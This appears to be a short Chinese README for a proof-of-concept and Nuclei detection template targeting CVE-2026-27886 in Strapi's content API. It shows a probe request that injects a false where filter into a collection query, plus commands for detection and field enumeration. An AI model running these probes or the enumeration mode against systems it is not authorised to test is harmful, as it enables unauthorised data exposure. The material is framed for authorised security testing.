仅限授权的安全测试。
包含:
CVE-2026-27886.py - Python PoCCVE-2026-27886.yaml - Nuclei 检测模板检查器向公开的 Strapi 内容 API 集合端点发送两个请求:
GET /api/<collection>
GET /api/<collection>?where[id][$lt]=-1
如果基线响应包含记录,而错误的 where 谓词将结果集缩减为零,则该端点可能存在漏洞。
安全检测:
python3 CVE-2026-27886.py http://strapi/api/articles
字段枚举:
python3 CVE-2026-27886.py http://strapi/api/articles --enum-fields
nuclei -t CVE-2026-27886.yaml -u http://strapi/api/articles